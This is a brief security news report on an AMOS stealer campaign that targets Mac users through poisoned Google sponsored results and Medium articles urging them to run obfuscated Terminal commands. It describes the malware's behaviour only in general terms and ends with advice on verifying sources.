Security researchers have uncovered a new malware campaign delivering AMOS stealers to Macs through Google search results. The attack exploits sponsored links and Medium articles, tricking users into running malicious Terminal commands. This follows a similar campaign from last month involving Google's AI search results.

The malware spreads through fake Apple support sites and compromised Medium articles appearing in Google's sponsored results. When users search for common macOS troubleshooting queries like "how to clear cache on macos tahoe," they encounter poisoned content leading to malicious scripts. The attack uses base-64 obfuscation similar to previous campaigns.

Once executed, the AMOS stealer immediately accesses sensitive data including Documents folders and Notes. The malware creates hidden files in the user's home directory, including an AppleScript agent, a Mach-O binary, and even stores passwords in plain text. Researchers note the malware shows unusual persistence even in virtual machine environments.

Security experts emphasize that macOS protections cannot prevent attacks where users are tricked into bypassing safeguards. The campaign highlights the ongoing challenge of malicious content in search results and the importance of verifying sources before executing any commands. Users should avoid running Terminal commands from untrusted sources and verify website authenticity before following technical advice.